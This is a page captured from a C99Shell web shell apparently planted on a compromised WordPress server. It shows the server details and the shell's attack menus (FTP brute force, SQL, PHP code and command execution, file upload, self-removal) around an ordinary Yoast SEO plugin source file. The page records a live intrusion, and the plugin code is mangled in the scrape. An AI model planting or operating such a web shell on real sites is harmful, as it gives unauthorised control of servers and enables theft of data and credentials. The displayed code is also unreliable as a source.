!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\wordpress-seo\admin\   drwxrwxrwx
Free 4.11 GB of 39.52 GB (10.39%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     class-sitemaps-admin.php (2.53 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @package WPSEO\Admin\XML Sitemaps
 */

/**
 * Class that handles the Admin side of XML sitemaps
 */
class WPSEO_Sitemaps_Admin {

    
/**
     * Class constructor
     */
    
function __construct() {
        
add_action'transition_post_status', array( $this'status_transition' ), 10);
        
add_action'admin_init', array( $this'delete_sitemaps' ) );
    }

    
/**
     * Find sitemaps residing on disk as they will block our rewrite.
     *
     * @todo issue #561 https://github.com/Yoast/wordpress-seo/issues/561
     */
    
function delete_sitemaps() {
        
$options WPSEO_Options::get_all();
        if ( 
$options['enablexmlsitemap'] === true ) {

            
$file_to_check_for = array(
                
// ABSPATH . 'sitemap.xml',
                // ABSPATH . 'sitemap.xslt',
                // ABSPATH . 'sitemap.xsl',
                
ABSPATH 'sitemap_index.xml',
            );

            
$new_files_found false;

            foreach ( 
$file_to_check_for as $file ) {
                if ( ( 
$options['blocking_files'] === array() || ( $options['blocking_files'] !== array() && in_array$file$options['blocking_files'] ) === false ) ) && file_exists$file ) ) {
                    
$options['blocking_files'][] = $file;
                    
$new_files_found             true;
                }
            }
            unset( 
$file );

            if ( 
$new_files_found === true ) {
                
update_option'wpseo'$options );
            }
        }
    }

    
/**
     * Hooked into transition_post_status. Will initiate search engine pings
     * if the post is being published, is a post type that a sitemap is built for
     * and is a post that is included in sitemaps.
     *
     * @param string   $new_status New post status.
     * @param string   $old_status Old post status.
     * @param \WP_Post $post       Post object.

     */
    
function status_transition$new_status$old_status$post ) {
        if ( 
$new_status != 'publish' ) {
            return;
        }

        
wp_cache_delete'lastpostmodified:gmt:' $post->post_type'timeinfo' ); // #17455

        
$options WPSEO_Options::get_all();
        if ( isset( 
$options'post_types-' $post->post_type '-not_in_sitemap' ] ) && $options'post_types-' $post->post_type '-not_in_sitemap' ] === true ) {
            return;
        }

        if ( 
WP_CACHE ) {
            
wp_schedule_single_event( ( time() + 300 ), 'wpseo_hit_sitemap_index' );
        }

        
// Allow the pinging to happen slightly after the hit sitemap index so the sitemap is fully regenerated when the ping happens.
        
if ( WPSEO_Meta::get_value'sitemap-include'$post->ID ) !== 'never' ) {
            if ( 
defined'YOAST_SEO_PING_IMMEDIATELY' ) && YOAST_SEO_PING_IMMEDIATELY ) {
                
wpseo_ping_search_engines();
            }
            else {
                
wp_schedule_single_event( ( time() + 300 ), 'wpseo_ping_search_engines' );
            }
        }
    }
/* End of class */


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--